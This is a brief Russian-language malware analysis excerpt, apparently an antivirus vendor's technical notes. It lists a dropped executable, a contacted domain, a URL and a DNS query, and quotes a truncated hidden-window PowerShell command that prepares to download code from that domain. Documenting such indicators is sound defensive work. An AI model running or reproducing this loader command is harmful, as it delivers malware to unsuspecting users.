Техническая информация
- %TEMP%\19514.exe
- 'bu#####ssensefm.co.uk':80
- http://bu#####ssensefm.co.uk/1/index.php
- DNS ASK bu#####ssensefm.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://businesssensefm.co.uk/1/index.php'.Sp...' (со скрытым окном)